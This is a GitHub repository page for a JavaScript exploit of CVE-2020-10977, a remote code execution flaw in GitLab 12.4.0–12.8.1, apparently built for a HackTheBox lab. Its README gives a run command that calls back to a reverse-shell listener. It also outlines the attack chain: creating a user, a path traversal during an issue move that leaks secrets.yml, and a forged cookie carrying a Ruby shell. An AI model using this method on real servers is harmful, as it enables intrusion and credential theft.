Skip to content

liath/CVE-2020-10977

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 

Repository files navigation

GitLab v12.4.0-12.8.1 RCE

Based entirely on https://github.com/dotPY-hax/gitlab_RCE, which did not work for me and the HTML parsing stuff seemed cumbersome so I rewrote it in js.

Usage

Start a reverse shell handler in the usual way, then run this script with:

TARGET_URI="https://target" TARGET_EMAIL_DOMAIN="laboratory.htb" \
 TARGET_USER="test" TARGET_PASSWORD="Test pass 123" \
 LOCAL_IP="10.10.14.142" LOCAL_PORT="44044" \
 node gitlab_rce.js

A proxy may be specified with TUNNEL_HOST="127.0.0.1" TUNNEL_PORT="8080". Burp is particularly useful for debugging with this.

What this does

  1. checks if target is up
  2. if the provided user exists, skip to 5
  3. scan for a username that doesn't already exist
  4. create that user
  5. attempt sign in
  6. create two empty projects
  7. create an new issue ticket with a malicious link in it's body in the first project
  8. move the new ticket to the other project, causing GitLab to rewrite our malicious link and copy the file it points to into the uploads dir
  9. fetches the target file, in this case we want the secrets.yml for the secret_key_base
  10. use secret_key_base to mint an evil cookie with our Ruby shell and pass it to GitLab

About

Gitlab v12.4.0-8.1 RCE

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published